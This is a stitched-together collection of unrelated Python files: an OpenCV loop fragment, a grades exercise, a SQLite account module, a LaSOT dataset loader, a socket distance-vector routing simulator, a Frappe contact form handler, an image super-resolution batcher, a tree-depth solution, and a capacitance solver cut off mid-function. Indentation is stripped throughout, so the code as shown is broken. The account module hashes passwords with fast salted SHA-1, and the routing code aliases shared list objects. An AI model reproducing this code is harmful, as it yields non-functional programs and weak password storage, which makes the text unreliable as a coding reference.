rect = hsv[y:y+h,x:x+w]
redContours(rect,imageFrame)
cv.imshow('frame',frame)
if cv.waitKey(20) & 0xFF == ord('d'):
break
cap.release()
cv.destroyAllWindows()
|
"""
Exercise 10
Grades for 10 students; count how many passed and how many failed
"""
i = 1
aprobado = 0
des_aprobado = 0
while i <= 10:
nota = int(input(f"Ingresa la nota del alumno numero: {i} : "))
i += 1
if nota >= 7:
aprobado += 1
else:
des_aprobado += 1
print(f"TOTAL APROBADOS : {aprobado}")
print(f"TOTAL DES-APROBADOS : {des_aprobado}")
|
'''
Class to help with communicating with the database.
'''
import sqlite3, os, base64, hashlib, csv
from .config import DB_FILE
def create_db():
''' Database created '''
conn = None
c = None
try:
if not os.path.exists(DB_FILE):
# create db connection
conn = sqlite3.connect(DB_FILE)
c = conn.cursor()
# create table
c.execute('''CREATE TABLE accounts
(
username text,
password text,
authlevel int
)''')
conn.commit()
c.close()
conn.close()
c = None
conn = None
with open('app/test_credentials.csv') as csv_file:
file = csv.reader(csv_file)
for row in file:
try:
add_user(row[0], row[1], int(row[2]))
except:
print('ERROR: Could not add one of the test credentials to the db.')
return True
else:
print('ERROR: Database already exists')
return False
except Exception:
print("ERROR: Error creating database")
if c is not None:
c.close()
if conn is not None:
conn.close()
return False
finally:
if c is not None:
c.close()
if conn is not None:
conn.close()
def add_user(username, password, auth_level):
''' Add user to database '''
safe_password = salted_pass(password)
data_to_insert = [(username, safe_password, auth_level)]
try:
conn = sqlite3.connect(DB_FILE)
c = conn.cursor()
c.executemany('INSERT INTO accounts VALUES (?, ?, ?)', data_to_insert)
conn.commit()
except sqlite3.IntegrityError:
print('ERROR: Attempt to add duplicate record.')
finally:
if c is not None:
c.close()
if conn is not None:
conn.close()
def retrieve_accounts():
''' Retrieves all user accounts from database '''
users = []
try:
conn = sqlite3.connect(DB_FILE)
c = conn.cursor()
for row in c.execute('SELECT * FROM accounts'):
users.append(row)
except sqlite3.DatabaseError:
print('Error. Could not retrieve data.')
finally:
try:
if c is not None:
c.close()
if conn is not None:
conn.close()
except Exception:
print("ERROR: It appears you did not run setup.py")
return users
def get_auth_level(username):
# finds correct account and returns auth level
users = retrieve_accounts()
auth_level = ''
for user in users:
if user[0] == username:
auth_level = user[2]
return auth_level
def salted_pass(password):
''' Returns hashed and salted password '''
# generates salt
token = os.urandom(30)
salt = base64.b64encode(token).decode('utf-8')
hashable = salt + password # concatenate salt and plain_text
hashable = hashable.encode('utf-8') # convert to bytes
this_hash = hashlib.sha1(hashable).hexdigest() # hash w/ SHA-1 and hexdigest
return salt + this_hash
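# Sketch of the matching check implied by the storage format above; it is
# illustrative only and not used by the rest of this module.
def password_matches(password, stored):
    ''' Return True if the candidate password re-hashed with the stored salt
    matches. The first 40 characters of the stored value are the base64 salt
    (30 random bytes encode to exactly 40 characters); the remainder is the
    SHA-1 hex digest produced by salted_pass. '''
    salt, stored_hash = stored[:40], stored[40:]
    hashable = (salt + password).encode('utf-8')
    return hashlib.sha1(hashable).hexdigest() == stored_hash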
if __name__ == '__main__':
print("ERROR: Only run from start.py and setup.py")
|
import os
import os.path
import torch
import numpy as np
import pandas
import csv
import random
from collections import OrderedDict
from .base_video_dataset import BaseVideoDataset
from lib.train.data import jpeg4py_loader
from lib.train.admin import env_settings
'''2021.1.16 Lasot for loading lmdb dataset'''
from lib.utils.lmdb_utils import *
class Lasot_lmdb(BaseVideoDataset):
def __init__(self, root=None, image_loader=jpeg4py_loader, vid_ids=None, split=None, data_fraction=None):
"""
args:
root - path to the lasot dataset.
image_loader (jpeg4py_loader) - The function to read the images. jpeg4py (https://github.com/ajkxyz/jpeg4py)
is used by default.
vid_ids - List containing the ids of the videos (1 - 20) used for training. If vid_ids = [1, 3, 5], then the
videos with subscripts -1, -3, and -5 from each class will be used for training.
split - If split='train', the official train split (protocol-II) is used for training. Note: Only one of
vid_ids or split option can be used at a time.
data_fraction - Fraction of dataset to be used. The complete dataset is used by default
"""
root = env_settings().lasot_lmdb_dir if root is None else root
super().__init__('LaSOT_lmdb', root, image_loader)
self.sequence_list = self._build_sequence_list(vid_ids, split)
class_list = [seq_name.split('-')[0] for seq_name in self.sequence_list]
self.class_list = []
for ele in class_list:
if ele not in self.class_list:
self.class_list.append(ele)
# Keep a list of all classes
self.class_to_id = {cls_name: cls_id for cls_id, cls_name in enumerate(self.class_list)}
if data_fraction is not None:
self.sequence_list = random.sample(self.sequence_list, int(len(self.sequence_list)*data_fraction))
self.seq_per_class = self._build_class_list()
def _build_sequence_list(self, vid_ids=None, split=None):
if split is not None:
if vid_ids is not None:
raise ValueError('Cannot set both split_name and vid_ids.')
ltr_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..')
if split == 'train':
file_path = os.path.join(ltr_path, 'data_specs', 'lasot_train_split.txt')
else:
raise ValueError('Unknown split name.')
sequence_list = pandas.read_csv(file_path, header=None, squeeze=True).values.tolist()
elif vid_ids is not None:
sequence_list = [c+'-'+str(v) for c in self.class_list for v in vid_ids]
else:
raise ValueError('Set either split_name or vid_ids.')
return sequence_list
def _build_class_list(self):
seq_per_class = {}
for seq_id, seq_name in enumerate(self.sequence_list):
class_name = seq_name.split('-')[0]
if class_name in seq_per_class:
seq_per_class[class_name].append(seq_id)
else:
seq_per_class[class_name] = [seq_id]
return seq_per_class
def get_name(self):
return 'lasot_lmdb'
def has_class_info(self):
return True
def has_occlusion_info(self):
return True
def get_num_sequences(self):
return len(self.sequence_list)
def get_num_classes(self):
return len(self.class_list)
def get_sequences_in_class(self, class_name):
return self.seq_per_class[class_name]
def _read_bb_anno(self, seq_path):
bb_anno_file = os.path.join(seq_path, "groundtruth.txt")
gt_str_list = decode_str(self.root, bb_anno_file).split('\n')[:-1] # the last line is empty
gt_list = [list(map(float, line.split(','))) for line in gt_str_list]
gt_arr = np.array(gt_list).astype(np.float32)
return torch.tensor(gt_arr)
def _read_target_visible(self, seq_path):
# Read full occlusion and out_of_view
occlusion_file = os.path.join(seq_path, "full_occlusion.txt")
out_of_view_file = os.path.join(seq_path, "out_of_view.txt")
occ_list = list(map(int, decode_str(self.root, occlusion_file).split(',')))
occlusion = torch.ByteTensor(occ_list)
out_view_list = list(map(int, decode_str(self.root, out_of_view_file).split(',')))
out_of_view = torch.ByteTensor(out_view_list)
target_visible = ~occlusion & ~out_of_view
return target_visible
def _get_sequence_path(self, seq_id):
seq_name = self.sequence_list[seq_id]
class_name = seq_name.split('-')[0]
vid_id = seq_name.split('-')[1]
return os.path.join(class_name, class_name + '-' + vid_id)
def get_sequence_info(self, seq_id):
seq_path = self._get_sequence_path(seq_id)
bbox = self._read_bb_anno(seq_path)
valid = (bbox[:, 2] > 0) & (bbox[:, 3] > 0)
visible = self._read_target_visible(seq_path) & valid.byte()
return {'bbox': bbox, 'valid': valid, 'visible': visible}
def _get_frame_path(self, seq_path, frame_id):
return os.path.join(seq_path, 'img', '{:08}.jpg'.format(frame_id+1)) # frames start from 1
def _get_frame(self, seq_path, frame_id):
return decode_img(self.root, self._get_frame_path(seq_path, frame_id))
def _get_class(self, seq_path):
raw_class = seq_path.split('/')[-2]
return raw_class
def get_class_name(self, seq_id):
seq_path = self._get_sequence_path(seq_id)
obj_class = self._get_class(seq_path)
return obj_class
def get_frames(self, seq_id, frame_ids, anno=None):
seq_path = self._get_sequence_path(seq_id)
obj_class = self._get_class(seq_path)
frame_list = [self._get_frame(seq_path, f_id) for f_id in frame_ids]
if anno is None:
anno = self.get_sequence_info(seq_id)
anno_frames = {}
for key, value in anno.items():
anno_frames[key] = [value[f_id, ...].clone() for f_id in frame_ids]
object_meta = OrderedDict({'object_class_name': obj_class,
'motion_class': None,
'major_class': None,
'root_class': None,
'motion_adverb': None})
return frame_list, anno_frames, object_meta
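# Hedged usage sketch (the root path is a placeholder for a real LaSOT lmdb
# directory); in practice the dataset is consumed by the training pipeline:
#
#   dataset = Lasot_lmdb(root="/path/to/lasot_lmdb", split="train")
#   info = dataset.get_sequence_info(0)                       # bbox / valid / visible tensors
#   frames, annos, meta = dataset.get_frames(0, [0, 10, 20])  # decoded frames + per-frame annos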
|
import socket
import threading
import time
import sys
# Define constant parameters
ALL_CONN = [8080,8181,8282,8383]
SERVER_PORT = 8181
IP_ADDR = "127.0.20.1"
ADDR = (IP_ADDR,SERVER_PORT)
CLIENT_ADDR = list(IP_ADDR)
CLIENT_ADDR[-1] = str(int(CLIENT_ADDR[-1]) + 1)
CLIENT_ADDR = "".join(CLIENT_ADDR)
CONFIG_PATH = "config.txt"
NODE_NUM = 2
PING_MSG = "abcdef"
PACKET_SIZE = 1024
FORMAT = "utf-8"
FACTOR = 10e3
UPPER_BOUND = 10e7
# define global variables
server = socket.socket()
client_sockets = []
client = [socket.socket()]*4
client_addrs = []
# Initialize global router table
rt = [['nil',-1,'nil']] * 4
rt[NODE_NUM-1] = [str('R'+str(NODE_NUM)),0,str('R'+str(NODE_NUM))]
latencies = [0.0] * 4
# getTopology() - gets the connection details of the nodes in the network
def getTopology():
# Open file
file = open(CONFIG_PATH,"r")
connections = []
# read the topology details line by line
line = file.readline()
while line:
# Get list of words in the line
words = line.strip().split(" ")
# Get ip and port details
ip_1,port_1 = words[0].split(":")
ip_2,port_2 = words[1].split(":")
# Update connection details
if(ip_1 == IP_ADDR):
connections.append([ip_2,int(port_2)])
elif(ip_2 == IP_ADDR):
connections.append([ip_1,int(port_1)])
line = file.readline()
return connections
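# Assumed config.txt layout, inferred from the parsing above: one link per
# line, written as two space-separated "ip:port" endpoints, for example:
#
#   127.0.20.1:8181 127.0.30.1:8282
#
# Only lines that mention IP_ADDR contribute to this node's connection list.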
# Define function to setup server
def setupServer(connections):
global server
global client_sockets
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind(ADDR)
server.listen()
print(f"[LISTENING Server is listening on {IP_ADDR}]")
time.sleep(5)
for i in range(0,len(connections)):
client_conn,cli_addr = server.accept()
client_sockets.append([cli_addr,client_conn])
print(f"[NEW CONNECTION] {cli_addr} connected.")
# Define the function to create client that connects with all nodes specified in the topology
def createClient(connections):
global client
global CLIENT_ADDR
i = 0
for conn in connections:
addr = (conn[0],int(conn[1]))
client[i] = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client[i].bind((CLIENT_ADDR,SERVER_PORT))
client[i].connect(addr)
CLIENT_ADDR = list(CLIENT_ADDR)
CLIENT_ADDR[-1] = str(int(CLIENT_ADDR[-1]) + 1)
CLIENT_ADDR = "".join(CLIENT_ADDR)
i = i + 1
# Let us define the listenToPing() function that responds to incoming pings
def listenToPing(conn):
msg = conn.recv(1024)
conn.send(msg)
# Runner thread to exchange latency contribution of current node to all requesting nodes
def exchangeLatency(conn, lat_str):
msg = conn.recv(1024).decode(FORMAT)
if(msg == "EXCHG"):
conn.send(lat_str.encode(FORMAT))
# function to update the RT based on latency costs from neighbors using Bellman Ford
def updateRT(index,lat_str):
latency = lat_str.strip().split(",")
latency = list(map(float,latency))
cost_x = rt[index][1]
for i in range(0,4):
updated_cost = cost_x + latency[i]
if(rt[i][1] > updated_cost):
rt[i][1] = updated_cost
rt[i][2] = str("R"+str(index+1))
# Given the current hop and destination find the next hop by calling the appropriate server
def getNextHop(curr_hop,dest,conn):
# First send request to node
request_msg = str(dest)
# time.sleep(2)
conn.send(request_msg.encode(FORMAT))
# Get next hop from node
next_hop = conn.recv(1024).decode(FORMAT)
next_hop = next_hop.strip().split(",")
return next_hop
# runner function to handle next hop requests
def nextHop(conn):
# global client_addrs
# global client_sockets
while(1):
req_msg = conn.recv(1024).decode(FORMAT)
dest = int(req_msg)
# Get next hop
next_hop = rt[dest][2]
# print("sada",next_hop)
if(int(next_hop[1]) != dest+1):
next_conn = client_sockets[client_addrs.index(int(ALL_CONN[int(rt[dest][2][-1]) - 1]))][1]
next_conn.send(str(dest).encode(FORMAT))
next_hop = next_hop + "," + next_conn.recv(1024).decode(FORMAT)
conn.send(next_hop.encode(FORMAT))
def main():
# First let us obtain the topology details from the config.txt file
connections = []
connections = getTopology()
num_connections = len(connections)
print("[NETWORK TOPOLOGY] Number of connections =",len(connections))
for conn in connections:
print("[NETWORK TOPOLOGY] ",IP_ADDR," --> ",conn[0],":",conn[1],sep ="")
# Now that we have the server client details let us create server and client in threads
thread = [0] * 2
thread[0] = threading.Thread(target = setupServer,args = [connections])
thread[0].start()
time.sleep(5)
thread[1] = threading.Thread(target = createClient,args = [connections])
thread[1].start()
# Join both the threads
thread[0].join()
thread[1].join()
# Sleep for 2 seconds to ensure the topology is constructed for all nodes
time.sleep(2)
# Find the latencies of the connections - RTT for a std message
curr_connected = [int(conn[1]) for conn in connections]
# First let us fill in max value for connections not connected to current node
for indx in range(0,len(ALL_CONN)):
if(int(ALL_CONN[indx]) not in curr_connected):
latencies[indx] = UPPER_BOUND
latencies[NODE_NUM - 1] = 0
# Now let us find the RTT of nodes connected to current node
# Setup all the clients in separate threads to respond to any incoming pings
ping_threads = [0] * num_connections
for i in range(0,num_connections):
ping_threads[i] = threading.Thread(target = listenToPing, args = [client[i]])
ping_threads[i].start()
print("[NETWORK TOPOLOGY] Pinging all connected nodes ...")
# Make the server ping all connections
for item in client_sockets:
conn = item[1]
start = time.time()
conn.send(PING_MSG.encode(FORMAT))
ret_msg = conn.recv(1024)
end = time.time()
latencies[ALL_CONN.index(int(item[0][1]))] = (end - start) * FACTOR
# Join all ping threads
for i in range(0,num_connections):
ping_threads[i].join()
print("[NETWORK TOPOLOGY] Latencies:",latencies)
# Init the routing table and print it
print("\n[DVR] Initial Routing Table is:")
print("%-20s %-25s %-20s" %("Destination","Cost (Latency)","Next Hop"))
for indx in range(0,4):
rt[indx] = [str('R'+str(indx+1)),latencies[indx],str('R'+str(indx+1))]
print("%-20s %-25s %-20s" %(rt[indx][0],rt[indx][1],rt[indx][2]))
# STEP-5: Update routing table - For 3 iterations
for loop in range(0,3):
print("\n******************* ITERATION -",loop+1,": ************************")
# First let us setup the string to be passed from R1 (comma separated latencies)
latency_str = ",".join([str(lat[1]) for lat in rt])
# Iterate over all nodes and request if connected
print("\n[DVR] Exchanging Routing Information ...")
for indx in range(0,4):
if indx == NODE_NUM-1:
continue
elif ALL_CONN[indx] not in curr_connected:
print("[DVR]",rt[NODE_NUM-1][0],"is not connected to",rt[indx][0])
# Setup threads to exchange the latency contributions of current code to requesting clients
latency_threads = [0] * num_connections
for i in range(0,num_connections):
latency_threads[i] = threading.Thread(target = exchangeLatency, args = [client[i],latency_str])
latency_threads[i].start()
request_msg = "EXCHG"
received_lat_str = ["0,0,0,0"]*4
i = 0
for item in client_sockets:
conn = item[1]
conn.send(request_msg.encode(FORMAT))
received_lat_str[ALL_CONN.index(int(item[0][1]))] = conn.recv(1024).decode(FORMAT)
for i in range(0,num_connections):
latency_threads[i].join()
print("[DVR] Received routing information is:")
print(received_lat_str)
# Update the router table based on the received latencies - Bellman Ford will used here
for indx in range(0,4):
if(received_lat_str[indx] != "0,0,0,0"):
updateRT(indx,received_lat_str[indx])
print("\n[DVR] Routing Table after iteration -",loop+1,"is: ")
print("%-20s %-25s %-20s" %("Destination","Cost (Latency)","Next Hop"))
for indx in range(0,4):
print("%-20s %-25s %-20s" %(rt[indx][0],rt[indx][1],rt[indx][2]))
# Print the route for each current src - destination pair
global client_addrs
client_addrs = [int(item[0][1]) for item in client_sockets]
    # First set up the server that will respond to next-hop requests from any connection
hop_threads = [0] * num_connections
for i in range(0,num_connections):
hop_threads[i] = threading.Thread(target = nextHop, args = [client[i]])
hop_threads[i].start()
# Iterate over each destination and find the route by requesting appropriate clients for the next hop
hop_list = [rt[NODE_NUM-1][0]]
print("\n[DVR] Printing routing information")
for i in range(0,4):
if i != NODE_NUM - 1:
dest = rt[i][0]
next_hop = rt[i][2]
hop_list.append(next_hop)
while(dest not in hop_list):
conn = client_sockets[client_addrs.index(ALL_CONN[int(rt[i][2][-1]) - 1])][1]
next_hop = getNextHop(int(next_hop[-1])-1,i,conn)
hop_list.extend(next_hop)
print(*hop_list, sep=' -> ')
hop_list = [rt[NODE_NUM-1][0]]
# Sleep 5 seconds and then close all hop_threads
time.sleep(5)
if __name__ == '__main__':
main()
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
import frappe
from frappe.utils import now
from frappe import _
sitemap = 1
def get_context(context):
doc = frappe.get_doc("Contact Us Settings", "Contact Us Settings")
if doc.query_options:
query_options = [opt.strip() for opt in doc.query_options.replace(",", "\n").split("\n") if opt]
else:
query_options = ["Sales", "Support", "General"]
out = {
"query_options": query_options,
"parents": [
{ "name": _("Home"), "route": "/" }
]
}
out.update(doc.as_dict())
return out
max_communications_per_hour = 1000
@frappe.whitelist(allow_guest=True)
def send_message(subject="Website Query", message="", sender=""):
if not message:
frappe.response["message"] = 'Please write something'
return
if not sender:
frappe.response["message"] = 'Email Address Required'
return
# guest method, cap max writes per hour
if frappe.db.sql("""select count(*) from `tabCommunication`
where `sent_or_received`="Received"
and TIMEDIFF(%s, modified) < '01:00:00'""", now())[0][0] > max_communications_per_hour:
frappe.response["message"] = "Sorry: we believe we have received an unreasonably high number of requests of this kind. Please try later"
return
# send email
forward_to_email = frappe.db.get_value("Contact Us Settings", None, "forward_to_email")
if forward_to_email:
frappe.sendmail(recipients=forward_to_email, sender=sender, content=message, subject=subject)
# add to to-do ?
frappe.get_doc(dict(
doctype = 'Communication',
sender=sender,
subject= _('New Message from Website Contact Page'),
sent_or_received='Received',
content=message,
status='Open',
)).insert(ignore_permissions=True)
return "okay"
|
"""
"""
import os
import numpy as np
import skimage.io
import skimage.filters
import skimage.transform
import skimage.util
import tensorflow as tf
def hd_image_to_sd_image(hd_image, scaling_factor):
"""
    Downscale the image and then scale it back up to build the SD version.
    Assumes the image is already of float type.
"""
hd_h, hd_w, c = hd_image.shape
# NOTE: downscaled size
sd_h = int(hd_h / scaling_factor)
sd_w = int(hd_w / scaling_factor)
# NOTE: in scikit-image 0.14, anti_aliasing fails if mode is 'edge'
# https://github.com/scikit-image/scikit-image/issues/3299
# DIY, sigma function is from the implementation of scikit-image
sigma = np.maximum(0.0, 0.5 * (scaling_factor - 1.0))
bl_image = skimage.filters.gaussian(hd_image, sigma, mode='nearest')
# NOTE: downscale then upscale
sd_image = skimage.transform.resize(
bl_image, [sd_h, sd_w], mode='edge', anti_aliasing=False)
sd_image = skimage.transform.resize(
sd_image, [hd_h, hd_w], mode='edge', anti_aliasing=False)
return sd_image
def image_batches(source_dir_path, scaling_factors, image_size, batch_size):
"""
source_dir_path:
read images inside this directory
scaling_factors:
different scale factors for training
image_size:
        randomly crop all images to image_size (width) x image_size (height)
batch_size:
number of images per batch
"""
def image_paths():
"""
        a generator that yields image paths within source_dir_path in random
order
"""
paths = tf.gfile.ListDirectory(source_dir_path)
while True:
np.random.shuffle(paths)
for path in paths:
yield os.path.join(source_dir_path, path)
# NOTE: arXiv:1511.04587v2, accurate image super-resolution using very deep
# convolutional networks
# figure 5
if scaling_factors is None or len(scaling_factors) <= 0:
scaling_factors = [2.0, 3.0, 4.0]
# NOTE: sanity check
if any([s <= 1 for s in scaling_factors]):
        raise Exception('invalid scaling factors')
    # NOTE: infinite image path generator
image_path_generator = image_paths()
# NOTE: container to keep images in a batch
sd_images = []
hd_images = []
while True:
hd_image_path = next(image_path_generator)
# NOTE: read image, images may come from google cloud storage
with tf.gfile.GFile(hd_image_path, 'rb') as hd_image_file:
hd_image = skimage.io.imread(hd_image_file)
# NOTE: drop small images
h, w, c = hd_image.shape
if h < image_size or w < image_size or c != 3:
continue
# NOTE: data augmentation, random crop to image_size x image_size x 3
        x = np.random.randint(w - image_size + 1)
        y = np.random.randint(h - image_size + 1)
hd_image = hd_image[y:y+image_size, x:x+image_size, :]
# NOTE: data augmentation, random horizontal flip
if 1 == np.random.choice([0, 1]):
hd_image = hd_image[:, ::-1, :]
# NOTE: cast uint8 to float32
hd_image = skimage.util.img_as_float32(hd_image)
# NOTE: build sd version
scaling_factor = np.random.choice(scaling_factors)
sd_image = hd_image_to_sd_image(hd_image, scaling_factor)
# NOTE: from [0.0, 1.0] to [-1.0, +1.0]
sd_image = sd_image * 2.0 - 1.0
hd_image = hd_image * 2.0 - 1.0
sd_images.append(sd_image)
hd_images.append(hd_image)
# NOTE: yield a collected batch
if len(sd_images) == batch_size:
sd_images = np.stack(sd_images, axis=0)
hd_images = np.stack(hd_images, axis=0)
yield sd_images, hd_images
sd_images = []
hd_images = []
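# Example (hypothetical usage): draw one batch of 128x128 crops from a local
# directory of JPEG/PNG images. The directory path below is a placeholder and
# must point at real image files for the generator to yield anything.
def _example_image_batches():
    batches = image_batches('/data/train_images', [2.0, 3.0, 4.0], 128, 16)
    sd_batch, hd_batch = next(batches)
    # both batches have shape (16, 128, 128, 3), scaled to [-1.0, +1.0]
    return sd_batch, hd_batch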
|
"""
# Definition for a Node.
class Node:
def __init__(self, val, children):
self.val = val
self.children = children
"""
class Solution:
def maxDepth(self, root: 'Node') -> int:
if not root:
return 0
stack = [(root, 1)]
maxVal = -float('inf')
while stack:
node, currDepth = stack.pop()
            children = node.children or []
            if not any(children):
maxVal = max(maxVal, currDepth)
for c in children:
if c:
stack.append([c, currDepth+1])
return maxVal
|
import numpy as np
from numpy.lib.arraysetops import union1d
from scipy import linalg
from scipy import sparse
from scipy.sparse import linalg as la
from tqdm import tqdm
import time
import copy
import capsol.newanalyzecapsol as nac
from datetime import datetime as dt
from dataclasses import dataclass
# R, Z = np.meshgrid(rs, zs) # z_size by r_size.
#
def sphere(r, z, Rtip):
"""Check if grid points are in the tip sphere.
    Parameters:
        r: radial coordinate(s) of the grid points
        z: height coordinate(s) of the grid points
        Rtip: radius of the spherical tip apex
    """
return (r**2 + (z - Rtip)**2) <= Rtip**2
def cone(r, z, Rtip, theta, hcone):
"""Check if grid points are in the tip cone."""
return np.where(np.logical_and(z >= Rtip, z<hcone), r <= (Rtip + (z - Rtip)*np.sin(theta)), False)
def body(r, z, hcone, dcant, rcant):
return np.where((z>=hcone) * (z<(hcone+dcant)), r <= rcant, False)
def sample(z, n_sample):
n, m = z.shape
return np.s_[1:1+n_sample, :]
def epsilon_z(z, d, eps_r):
"""Returns epsilon_r(z) defined on the staggered grid.
Ex: For d = 1.0 nm, a grid spaced every 0.5 nm, and eps_r = 3.0, we have
z_ind z epsz_ind eps_z
0 -2.0 -----------
0 3.0
1 -1.5 -- sample --
1 3.0
2 -1.0 ------------
2 1.0
    3    -0.5   -- vacuum --
3 1.0
4 0 -------------
tip
Note that the array returned is always 1 shorter than the input array of z values.
"""
tol = 1e-8 # Add a small margin for rounding error
return np.where(z[1:] <= (-d+tol), eps_r, 1.0)
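# Example (minimal sketch mirroring the docstring above): for d = 1.0 nm, a grid
# spaced every 0.5 nm and eps_r = 3.0, the first two staggered cells lie inside
# the sample and the remaining two in the vacuum gap.
def _example_epsilon_z():
    z = np.array([-2.0, -1.5, -1.0, -0.5, 0.0])
    return epsilon_z(z, d=1.0, eps_r=3.0)  # -> array([3., 3., 1., 1.])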
def geometric_sum(r, a1, n):
return sum(np.array([a1 * r ** i for i in range(1, n + 1)]))
def find_ratio(total, h0, terms):
r = 1.00001
s = 0
while s < total:
s = geometric_sum(r, h0, terms)
r += 0.00001
return r
def guni_grid(nuni, n, h0, grid_max):
"""Generates geometric grid which can be used for the radial and z directions.
nuni: number of uniform grid points
n: number of gird points
h0: initial grid spacing
grid_max: rho_max or z_max, maximum grid size"""
r = np.zeros(n+1)
dr = np.zeros(n) # Could also use n+1
dr[:nuni] = h0
r[1:nuni+1] = np.cumsum(dr[:nuni])
r_left = grid_max-(nuni*h0)
n_left=n-nuni
ratio= find_ratio(r_left, h0, n_left)
for i in range(n_left):
dr[nuni+i]= h0*ratio**(i+1)
r[1:] = np.cumsum(dr[:])
return r, ratio
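# Example (illustrative values): a radial grid with 10 uniform points of
# spacing 0.5 nm followed by 40 geometrically stretched points out to 1000 nm.
# The returned ratio is the common factor between successive spacings in the
# stretched region.
def _example_guni_grid():
    r, ratio = guni_grid(nuni=10, n=50, h0=0.5, grid_max=1000.0)
    # r[0] == 0.0, r[10] == 5.0 (end of the uniform region), r[-1] is ~1000 nm
    return r, ratio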
def gapsam_gridsize(h0, hsam, z):
n_sample=int(np.round(hsam/h0))
n_gap=int(np.round(z/h0))
gapsam=n_sample + n_gap # No need for an extra point - use the bottom of the sample as the boundary
return gapsam
def generate_gapsam_grid(h0, hsam, z):
N=gapsam_gridsize(h0, hsam, z)
z_minus=np.arange(N)*h0 + -(z+hsam)
return z_minus
# def setup_probe(R, Z, Rtip, theta, hcone, dcant):
# # Tip points if code, sphere, body
# spm_tip = ( cs.cone(R, Z, Rtip, theta, hcone) + cs.sphere(R, Z, Rtip)
# + cs.body(R, Z, hcone, dcant, rcant) )
# # Need to make sure there is one data point in the cantilever...
# z_grid = Z[:, 0] # A single Z column
# b = np.ones_like(R) # set the boundaries
# u = np.zeros_like(R)
# u[spm_tip] = 1.0
# # Ra = Rtip * (1 - np.sin(theta))
# # Rc = Rtip * np.cos(theta)
# probe_top = np.zeros_like(z_grid, dtype=int)
# # -1 means that the probe is not directly above this data point at all
# probe_bot = np.ones_like(r, dtype=int)*-1
# for i, row in enumerate(spm_tip.T):
# if any(row):
# probe_bot[i] = np.argmax(row) # First z value where the probe is found
# # Specify boundaries
# b[0, :] = 0.0
# b[-1, :] = 0.0
# b[:, -1] = 0.0
# itop = np.argmax(z_grid > (hcone+dcant))
# probe_top[:] = itop
# return b, u, probe_top, probe_bot
def boundary_radial(Nr, Nz):
"""Returns points that are on the cylindrical coordinate boundary. As a 2D array u_ij,
where i is the z-coordinate index and j is the radius index, this returns a boundary array where points
where i = 0 or Nz - 1 or j = Nr - 1 return True.
"""
bc = np.zeros(Nr*Nz,dtype=bool)
for i in range(Nz):
for j in range(Nr):
if i == 0 or i == (Nz-1) or j == (Nr-1):
ind = i * Nr + j # This point
bc[ind] = True
return bc
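# Example (tiny sketch): on a grid with Nr = 3 radial and Nz = 4 vertical
# points, the mask marks the first and last z rows plus the outer-radius
# column (8 of the 12 points); the r = 0 axis is left free.
def _example_boundary_radial():
    bc = boundary_radial(Nr=3, Nz=4)
    return bc.reshape(4, 3)  # rows 0 and 3 all True, column 2 True everywhere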
def poisson_variable_spacing_radial(x, y):
Nx = len(x)
Ny = len(y)
hx = np.diff(x)
hy = np.diff(y)
A = sparse.lil_matrix((Nx*Ny, Nx*Ny))
for i in range(Ny):
for j in range(Nx): # Radial
ind = i * Nx + j # This point
ixp = ind + 1 # +x
ixn = ind - 1 # -x
iyp = (i+1)*Nx + j # +y
iyn = (i-1)*Nx + j # -y
Dx_plus = hx[j] if j < (Nx-1) else 0.0
Dx_minus = hx[j-1] if j > 0 else hx[j]
x0 = x[j]
Dy_plus = hy[i] if i < (Ny-1) else 0.0
Dy_minus = hy[i-1] if i > 0 else 0.0
prefactor_x = 4/((Dx_plus+Dx_minus)*(Dx_plus**2 + Dx_minus**2))
prefactor_y = 4/((Dy_plus+Dy_minus)*(Dy_plus**2 + Dy_minus**2))
A[ind, ind] = (Dx_plus+Dx_minus) * prefactor_x + (Dy_plus+Dy_minus) * prefactor_y
if j == 0:
A[ind, ixp] = -2 * Dx_minus * prefactor_x # That's it, no radial derivative here...
elif j < (Nx - 1):
A[ind, ixp] = -1 * Dx_minus * prefactor_x + -1 / (x0 * (Dx_plus+Dx_minus))
if j > 0:
A[ind, ixn] = -1 * Dx_plus * prefactor_x + 1 / (x0 * (Dx_plus+Dx_minus))
if j == (Nx - 1):
A[ind, ind] += -1 / (x0 * (Dx_plus+Dx_minus)) # 1st order difference uses the grid point here...
if i > 0:
A[ind, iyn] = -1 * Dy_plus * prefactor_y
if i < (Ny-1):
A[ind, iyp] = -1 * Dy_minus * prefactor_y
return sparse.csr_matrix(A) # Convert to better format for usage
def poisson_variable_spacing_radial_samp(r, y, eps_z):
Nr = len(r)
Ny = len(y)
hr = np.diff(r)
hy = np.diff(y)
# Define eps_z on the same grid as the voltage (eps_z uses the staggered grid)
eps_z_grid = np.r_[0.5+eps_z[0]*0.5, 0.5*(eps_z[1:]+eps_z[:-1]), 0.5+eps_z[-1]*0.5]
A = sparse.lil_matrix((Nr*Ny, Nr*Ny))
for i in range(Ny):
for j in range(Nr): # Radial
ind = i * Nr + j # This point
irp = ind + 1 # +r
irn = ind - 1 # -r
iyp = (i+1)*Nr + j # +y
iyn = (i-1)*Nr + j # -y
Dr_plus = hr[j] if j < (Nr-1) else 0.0
Dr_minus = hr[j-1] if j > 0 else hr[j]
r0 = r[j]
eps_r = eps_z_grid[i] # Grab our estimate of eps_r at the grid boundary...
eps_p = eps_z[i] if i < (Ny-1) else 1.0
eps_m = eps_z[i-1] if i > 0 else 1.0
Dy_plus = hy[i] if i < (Ny-1) else 0.0
Dy_minus = hy[i-1] if i > 0 else 0.0
prefactor_r = 4/((Dr_plus+Dr_minus)*(Dr_plus**2 + Dr_minus**2))
# This is different I think...
# At the boundary, we need a different approximation...
if (i > 0) and i < (Ny-1):
prefactor_y = 2/((Dy_plus+Dy_minus) * Dy_minus * Dy_plus)
else:
prefactor_y = 4/((Dy_plus+Dy_minus)*(Dy_plus**2 + Dy_minus**2))
# Smallest index first...
if i > 0:
A[ind, iyn] = -1 * Dy_plus * eps_m * prefactor_y
# Second index...
if j > 0:
A[ind, irn] = -eps_r * Dr_plus * prefactor_r + eps_r / (r0 * (Dr_plus+Dr_minus))
# On the diagonal next...
A[ind, ind] = (Dr_plus+Dr_minus) * prefactor_r * eps_r + (eps_m*Dy_plus+eps_p*Dy_minus) * prefactor_y
if j == (Nr - 1):
A[ind, ind] += -eps_r / (r0 * (Dr_plus+Dr_minus)) # 1st order difference uses the grid point here...
if j == 0:
